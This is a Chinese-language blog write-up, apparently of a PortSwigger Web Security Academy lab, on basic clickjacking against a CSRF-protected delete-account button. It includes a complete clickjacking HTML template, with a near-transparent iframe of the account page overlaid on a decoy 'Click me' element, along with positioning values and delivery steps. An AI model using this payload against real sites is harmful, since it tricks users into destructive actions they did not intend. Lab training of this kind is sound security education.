Lab: Basic clickjacking with CSRF token protection:使用CSRF令牌保护的基本点击劫持

靶场内容:

该实验室包含登录功能和受CSRF 令牌保护的删除帐户按钮。用户将点击诱饵网站上显示“点击”一词的元素。

为了解决这个实验,制作一些 HTML 来构建帐户页面并欺骗用户删除他们的帐户。删除帐号后,实验室就解决了。

您可以使用以下凭据登录自己的帐户: wiener:peter

注意
受害者将使用 Chrome,因此请在该浏览器上测试您的漏洞利用。

靶场解决方法

  • 说实话,这就是一个隐藏页面的点击劫持
  • 主要是CSRF的token已经存在了,就恰好利用这个token进行一些非法操作
  • 在目标网站上登录您的帐户。
  • 转到漏洞利用服务器并将以下 HTML 模板粘贴到“Body”部分:
<style>
   /iframe {
       position:relative;
       width:$width_value;
       height: $height_value;
       opacity: $opacity;
       z-index: 2;
   }
   div {
       position:absolute;
       top:$top_value;
       left:$side_value;
       z-index: 1;
   }
</style>
<div>Test me</div>
<iframe src="$url"></iframe>

  • 对模板进行以下调整:
    • 将$url属性中的内容替换为目标网站用户my-account页面的 URL。
    • 为iframe的$height_value和$width_value变量替换合适的像素值(我们分别建议 700px 和 500px)。
    • 为诱饵网页内容的$top_value和$side_value变量替换合适的像素值,以便“删除帐户”按钮和“测试我”诱饵动作对齐(我建议 480 像素和 60 像素)。
    • 设置不透明度值 $opacity 以确保目标 iframe 是透明的。最初,使用 0.1 的不透明度,以便您可以对齐 iframe 操作并根据需要调整位置值。对于提交的攻击,值 0.0001 将起作用。
  • 单击“存储”,然后单击“查看漏洞利用”。
  • 将鼠标悬停在“Test me”上并确保光标变为手形,表明 div 元素已正确定位。不要自己实际单击“删除帐户”按钮。如果这样做,实验室将被破坏,您需要等到它重置后再试(大约 20 分钟)。如果 div 没有正确对齐,请调整样式表的top和left属性。
  • 正确排列 div 元素后,将“Test me”更改为“Click me”,然后单击“Store”。
  • 点击“向受害者提供漏洞利用”,实验室应该就解决了。(如果不能解决就调整参数)
posted @ 2021-08-23 19:11  Zeker62  阅读(139)  评论(0编辑  收藏  举报